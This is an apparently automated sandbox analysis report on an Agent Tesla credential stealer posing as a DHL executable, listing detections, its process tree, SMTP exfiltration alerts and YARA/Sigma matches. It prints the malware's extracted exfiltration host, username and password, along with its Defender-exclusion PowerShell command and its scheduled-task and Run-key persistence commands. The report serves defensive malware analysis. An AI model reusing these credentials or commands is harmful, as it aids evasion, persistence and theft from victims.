Windows Analysis Report
DHL_1003671162.exe

Overview

General Information

Sample name: DHL_1003671162.exe
Analysis ID: 1430783
MD5: 1d584d84d4965e7a0da615b32ab85f2e
SHA1: bbb9c2211444450bb34a27f1a98d778e3c96b9bb
SHA256: 061087cd835abcfc3411f0ec4b15ccf80516276a356b2eedc4cb444d0dac0187
Tags: AgentTesla, DHL, exe

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
.NET source code contains very large array initializations
Adds a directory exclusion to Windows Defender
Contains functionality to log keystrokes (.Net Source)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • DHL_1003671162.exe (PID: 7456 cmdline: "C:\Users\user\Desktop\DHL_1003671162.exe" MD5: 1D584D84D4965E7A0DA615B32AB85F2E)
    • powershell.exe (PID: 7644 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\qmUxKv.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7944 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7672 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qmUxKv" /XML "C:\Users\user\AppData\Local\Temp\tmp3999.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • DHL_1003671162.exe (PID: 7812 cmdline: "C:\Users\user\Desktop\DHL_1003671162.exe" MD5: 1D584D84D4965E7A0DA615B32AB85F2E)
  • qmUxKv.exe (PID: 7924 cmdline: C:\Users\user\AppData\Roaming\qmUxKv.exe MD5: 1D584D84D4965E7A0DA615B32AB85F2E)
    • schtasks.exe (PID: 8120 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qmUxKv" /XML "C:\Users\user\AppData\Local\Temp\tmp46C8.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 8128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • qmUxKv.exe (PID: 8168 cmdline: "C:\Users\user\AppData\Roaming\qmUxKv.exe" MD5: 1D584D84D4965E7A0DA615B32AB85F2E)
    • conhost.exe (PID: 1432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • boqXv.exe (PID: 6972 cmdline: "C:\Users\user\AppData\Roaming\boqXv\boqXv.exe" MD5: 1D584D84D4965E7A0DA615B32AB85F2E)
    • schtasks.exe (PID: 5308 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qmUxKv" /XML "C:\Users\user\AppData\Local\Temp\tmp6C70.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • boqXv.exe (PID: 7736 cmdline: "C:\Users\user\AppData\Roaming\boqXv\boqXv.exe" MD5: 1D584D84D4965E7A0DA615B32AB85F2E)
  • boqXv.exe (PID: 7656 cmdline: "C:\Users\user\AppData\Roaming\boqXv\boqXv.exe" MD5: 1D584D84D4965E7A0DA615B32AB85F2E)
    • schtasks.exe (PID: 8152 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qmUxKv" /XML "C:\Users\user\AppData\Local\Temp\tmp8A0A.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 8148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • boqXv.exe (PID: 7196 cmdline: "C:\Users\user\AppData\Roaming\boqXv\boqXv.exe" MD5: 1D584D84D4965E7A0DA615B32AB85F2E)
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.clslk.com", "Username": "gm@clslk.com", "Password": "NUZRATHinam1978"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security

Source | Rule | Description | Author | Strings
0000000B.00000002.2933168050.0000000002F64000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000006.00000002.2933834693.0000000002F32000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000010.00000002.1903974100.0000000003302000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000010.00000002.1903974100.000000000330A000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000014.00000002.2933907510.00000000033C2000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security

Source | Rule | Description | Author | Strings
7.2.qmUxKv.exe.486f5a0.7.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
7.2.qmUxKv.exe.486f5a0.7.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
7.2.qmUxKv.exe.486f5a0.7.unpack | INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Detects executables referencing Windows vault credential objects. Observed in infostealers | ditekSHen | Strings:
  • 0x31cfc:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
  • 0x31d6e:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
  • 0x31df8:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
  • 0x31e8a:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
  • 0x31ef4:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
  • 0x31f66:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
  • 0x31ffc:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
  • 0x3208c:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.DHL_1003671162.exe.3a44990.6.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
0.2.DHL_1003671162.exe.3a44990.6.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security

                      System Summary

                      Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\qmUxKv.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\qmUxKv.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL_1003671162.exe", ParentImage: C:\Users\user\Desktop\DHL_1003671162.exe, ParentProcessId: 7456, ParentProcessName: DHL_1003671162.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\qmUxKv.exe", ProcessId: 7644, ProcessName: powershell.exe
                      Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\DHL_1003671162.exe, ProcessId: 7812, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\boqXv
                      Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qmUxKv" /XML "C:\Users\user\AppData\Local\Temp\tmp46C8.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qmUxKv" /XML "C:\Users\user\AppData\Local\Temp\tmp46C8.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\qmUxKv.exe, ParentImage: C:\Users\user\AppData\Roaming\qmUxKv.exe, ParentProcessId: 7924, ParentProcessName: qmUxKv.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qmUxKv" /XML "C:\Users\user\AppData\Local\Temp\tmp46C8.tmp", ProcessId: 8120, ProcessName: schtasks.exe
                      Source: Network Connection, Author: frack113: Data: DestinationIp: 50.87.253.239, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\DHL_1003671162.exe, Initiated: true, ProcessId: 7812, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49733
                      Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qmUxKv" /XML "C:\Users\user\AppData\Local\Temp\tmp3999.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qmUxKv" /XML "C:\Users\user\AppData\Local\Temp\tmp3999.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL_1003671162.exe", ParentImage: C:\Users\user\Desktop\DHL_1003671162.exe, ParentProcessId: 7456, ParentProcessName: DHL_1003671162.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qmUxKv" /XML "C:\Users\user\AppData\Local\Temp\tmp3999.tmp", ProcessId: 7672, ProcessName: schtasks.exe
                      Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\qmUxKv.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\qmUxKv.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL_1003671162.exe", ParentImage: C:\Users\user\Desktop\DHL_1003671162.exe, ParentProcessId: 7456, ParentProcessName: DHL_1003671162.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\qmUxKv.exe", ProcessId: 7644, ProcessName: powershell.exe

                      Persistence and Installation Behavior

                      Source: Process started, Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qmUxKv" /XML "C:\Users\user\AppData\Local\Temp\tmp3999.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qmUxKv" /XML "C:\Users\user\AppData\Local\Temp\tmp3999.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL_1003671162.exe", ParentImage: C:\Users\user\Desktop\DHL_1003671162.exe, ParentProcessId: 7456, ParentProcessName: DHL_1003671162.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qmUxKv" /XML "C:\Users\user\AppData\Local\Temp\tmp3999.tmp", ProcessId: 7672, ProcessName: schtasks.exe
                      Timestamp | SID | Source Port | Destination Port | Protocol | Classtype
                      04/24/24-07:15:28.935178 | 2839723 | 49738 | 587 | TCP | A Network Trojan was detected
                      04/24/24-07:15:34.872020 | 2839723 | 49743 | 587 | TCP | A Network Trojan was detected
                      04/24/24-07:15:17.806983 | 2840032 | 49736 | 587 | TCP | A Network Trojan was detected
                      04/24/24-07:15:17.806983 | 2839723 | 49736 | 587 | TCP | A Network Trojan was detected
                      04/24/24-07:15:17.806983 | 2851779 | 49736 | 587 | TCP | A Network Trojan was detected
                      04/24/24-07:15:15.003229 | 2855542 | 49733 | 587 | TCP | A Network Trojan was detected
                      04/24/24-07:15:15.003229 | 2855245 | 49733 | 587 | TCP | A Network Trojan was detected
                      04/24/24-07:15:34.872156 | 2840032 | 49743 | 587 | TCP | A Network Trojan was detected
                      04/24/24-07:15:15.003170 | 2030171 | 49733 | 587 | TCP | A Network Trojan was detected
                      04/24/24-07:15:28.935275 | 2855542 | 49738 | 587 | TCP | A Network Trojan was detected
                      04/24/24-07:15:28.935275 | 2855245 | 49738 | 587 | TCP | A Network Trojan was detected
                      04/24/24-07:15:28.935178 | 2030171 | 49738 | 587 | TCP | A Network Trojan was detected
                      04/24/24-07:15:34.872020 | 2030171 | 49743 | 587 | TCP | A Network Trojan was detected
                      04/24/24-07:15:17.806983 | 2855542 | 49736 | 587 | TCP | A Network Trojan was detected
                      04/24/24-07:15:17.806983 | 2855245 | 49736 | 587 | TCP | A Network Trojan was detected
                      04/24/24-07:15:34.872156 | 2851779 | 49743 | 587 | TCP | A Network Trojan was detected
                      04/24/24-07:15:15.003170 | 2839723 | 49733 | 587 | TCP | A Network Trojan was detected
                      04/24/24-07:15:28.935275 | 2851779 | 49738 | 587 | TCP | A Network Trojan was detected
                      04/24/24-07:15:15.003229 | 2840032 | 49733 | 587 | TCP | A Network Trojan was detected
                      04/24/24-07:15:17.806983 | 2030171 | 49736 | 587 | TCP | A Network Trojan was detected
                      04/24/24-07:15:15.003229 | 2851779 | 49733 | 587 | TCP | A Network Trojan was detected
                      04/24/24-07:15:34.872156 | 2855542 | 49743 | 587 | TCP | A Network Trojan was detected
                      04/24/24-07:15:34.872156 | 2855245 | 49743 | 587 | TCP | A Network Trojan was detected
                      04/24/24-07:15:28.935275 | 2840032 | 49738 | 587 | TCP | A Network Trojan was detected

                      AV Detection

                      Source: DHL_1003671162.exe, Avira: detected
                      Source: http://mail.clslk.com, Avira URL Cloud: Label: malware
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe, Avira: detection malicious, Label: HEUR/AGEN.1323731
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exe, Avira: detection malicious, Label: HEUR/AGEN.1323731
                      Source: 0.2.DHL_1003671162.exe.3a44990.6.raw.unpack, Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.clslk.com", "Username": "gm@clslk.com", "Password": "NUZRATHinam1978"}
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe, ReversingLabs: Detection: 63%
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe, Virustotal: Detection: 57%
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exe, ReversingLabs: Detection: 63%
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exe, Virustotal: Detection: 57%
                      Source: DHL_1003671162.exe, Virustotal: Detection: 57%
                      Source: DHL_1003671162.exe, ReversingLabs: Detection: 63%
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe, Joe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exe, Joe Sandbox ML: detected
                      Source: DHL_1003671162.exe, Joe Sandbox ML: detected
                      Source: DHL_1003671162.exe, Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                      Source: DHL_1003671162.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                      Networking

                      Source: Traffic, Snort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.4:49733 -> 50.87.253.239:587
                      Source: Traffic, Snort IDS: 2855245 ETPRO TROJAN Agent Tesla Exfil via SMTP 192.168.2.4:49733 -> 50.87.253.239:587
                      Source: Traffic, Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:49733 -> 50.87.253.239:587
                      Source: Traffic, Snort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.4:49733 -> 50.87.253.239:587
                      Source: Traffic, Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.4:49733 -> 50.87.253.239:587
                      Source: Traffic, Snort IDS: 2839723 ETPRO TROJAN Win32/Agent Tesla SMTP Activity 192.168.2.4:49733 -> 50.87.253.239:587
                      Source: Traffic, Snort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.4:49736 -> 50.87.253.239:587
                      Source: Traffic, Snort IDS: 2855245 ETPRO TROJAN Agent Tesla Exfil via SMTP 192.168.2.4:49736 -> 50.87.253.239:587
                      Source: Traffic, Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:49736 -> 50.87.253.239:587
                      Source: Traffic, Snort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.4:49736 -> 50.87.253.239:587
                      Source: Traffic, Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.4:49736 -> 50.87.253.239:587
                      Source: Traffic, Snort IDS: 2839723 ETPRO TROJAN Win32/Agent Tesla SMTP Activity 192.168.2.4:49736 -> 50.87.253.239:587
                      Source: Traffic, Snort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.4:49738 -> 50.87.253.239:587
                      Source: Traffic, Snort IDS: 2855245 ETPRO TROJAN Agent Tesla Exfil via SMTP 192.168.2.4:49738 -> 50.87.253.239:587
                      Source: Traffic, Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:49738 -> 50.87.253.239:587
                      Source: Traffic, Snort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.4:49738 -> 50.87.253.239:587
                      Source: Traffic, Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.4:49738 -> 50.87.253.239:587
                      Source: Traffic, Snort IDS: 2839723 ETPRO TROJAN Win32/Agent Tesla SMTP Activity 192.168.2.4:49738 -> 50.87.253.239:587
                      Source: Traffic, Snort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.4:49743 -> 50.87.253.239:587
                      Source: Traffic, Snort IDS: 2855245 ETPRO TROJAN Agent Tesla Exfil via SMTP 192.168.2.4:49743 -> 50.87.253.239:587
                      Source: Traffic, Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:49743 -> 50.87.253.239:587
                      Source: Traffic, Snort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.4:49743 -> 50.87.253.239:587
                      Source: Traffic, Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.4:49743 -> 50.87.253.239:587
                      Source: Traffic, Snort IDS: 2839723 ETPRO TROJAN Win32/Agent Tesla SMTP Activity 192.168.2.4:49743 -> 50.87.253.239:587
                      Source: global traffic, TCP traffic: 192.168.2.4:49733 -> 50.87.253.239:587
                      Source: Joe Sandbox View, IP Address: 50.87.253.239
                      Source: Joe Sandbox View, ASN Name: UNIFIEDLAYER-AS-1US
                      Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknown, DNS traffic detected: queries for: mail.clslk.com
                      Source: DHL_1003671162.exe, 00000006.00000002.2933834693.0000000002F3A000.00000004.00000800.00020000.00000000.sdmp, qmUxKv.exe, 0000000B.00000002.2933168050.0000000002F6C000.00000004.00000800.00020000.00000000.sdmp, boqXv.exe, 00000010.00000002.1903974100.000000000330A000.00000004.00000800.00020000.00000000.sdmp, boqXv.exe, 00000014.00000002.2933907510.00000000033CA000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://mail.clslk.com
                      Source: DHL_1003671162.exe, 00000000.00000002.1693256058.0000000003A08000.00000004.00000800.00020000.00000000.sdmp, qmUxKv.exe, 00000007.00000002.1732952396.000000000486F000.00000004.00000800.00020000.00000000.sdmp, boqXv.exe, 00000010.00000002.1894023046.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://account.dyn.com/

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      Source: 0.2.DHL_1003671162.exe.3a44990.6.raw.unpack, umlRMRbjNqD.cs .Net Code: fKv0R
                      Source: 0.2.DHL_1003671162.exe.3a09970.8.raw.unpack, umlRMRbjNqD.cs .Net Code: fKv0R

                      System Summary

                      Source: 7.2.qmUxKv.exe.486f5a0.7.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.DHL_1003671162.exe.3a44990.6.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 7.2.qmUxKv.exe.48aa5c0.8.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.DHL_1003671162.exe.3a44990.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 16.2.boqXv.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.DHL_1003671162.exe.3a09970.8.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 7.2.qmUxKv.exe.486f5a0.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 7.2.qmUxKv.exe.48aa5c0.8.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.DHL_1003671162.exe.3a09970.8.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.DHL_1003671162.exe.7190000.10.raw.unpack, HomeView.cs Large array initialization: array initializer size 33604
                      Source: DHL_1003671162.exe, 00000000.00000002.1704965625.0000000007190000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSimpleLogin.dll8 vs DHL_1003671162.exe
                      Source: DHL_1003671162.exe, 00000000.00000002.1693256058.0000000003A08000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename9e4810db-acaa-47dc-a281-6153255fd520.exe4 vs DHL_1003671162.exe
                      Source: DHL_1003671162.exe, 00000000.00000002.1707261132.000000000B170000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs DHL_1003671162.exe
                      Source: DHL_1003671162.exe, 00000000.00000002.1689302752.0000000000A5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs DHL_1003671162.exe
                      Source: DHL_1003671162.exe, 00000000.00000002.1690593567.0000000002A33000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename9e4810db-acaa-47dc-a281-6153255fd520.exe4 vs DHL_1003671162.exe
                      Source: DHL_1003671162.exe, 00000000.00000002.1693256058.00000000043DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs DHL_1003671162.exe
                      Source: DHL_1003671162.exe, 00000000.00000000.1662439926.0000000000542000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameelby.exe0 vs DHL_1003671162.exe
                      Source: DHL_1003671162.exe, 00000006.00000002.2924858625.0000000000F88000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs DHL_1003671162.exe
                      Source: DHL_1003671162.exeBinary or memory string: OriginalFilenameelby.exe0 vs DHL_1003671162.exe
                      Source: DHL_1003671162.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                      Source: 7.2.qmUxKv.exe.486f5a0.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.DHL_1003671162.exe.3a44990.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 7.2.qmUxKv.exe.48aa5c0.8.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.DHL_1003671162.exe.3a44990.6.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 16.2.boqXv.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.DHL_1003671162.exe.3a09970.8.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 7.2.qmUxKv.exe.486f5a0.7.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 7.2.qmUxKv.exe.48aa5c0.8.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.DHL_1003671162.exe.3a09970.8.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
